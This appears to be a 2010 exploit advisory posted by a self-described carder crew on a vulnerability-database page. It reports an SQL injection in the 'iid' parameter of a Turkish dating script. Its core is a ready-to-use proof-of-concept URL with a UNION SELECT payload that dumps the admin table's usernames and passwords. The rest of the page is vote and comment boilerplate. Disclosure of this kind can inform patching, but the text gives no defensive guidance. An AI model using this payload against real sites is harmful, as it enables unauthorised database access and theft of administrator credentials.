WebScript Arkadaslik Script (iid) SQL injection Vulnerability

2010.12.19

Credit: v3n0m

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

-----------------------------------------------------------------------
     WebScript Arkadaslik Script (iid) SQL injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: December, 18-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Arkada?l&#305;k Scrpti
Vendor  	: http://webscripti.com/incele.php?incele=2

Exploit & p0c
_____________

**[SQLi]
http://site/[path]/?s=detay&iid=[SQLi]
http://site/[path]/?s=detay&iid=-9999+union+all+select+null,group_concat(kullaniciadi,char(58),sifre),null,null+from+admin--

_______________________________________

All YOGYACARDERLINK CREW & Jovita Andy
_______________________________________

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebScript Arkadaslik Script (iid) SQL injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.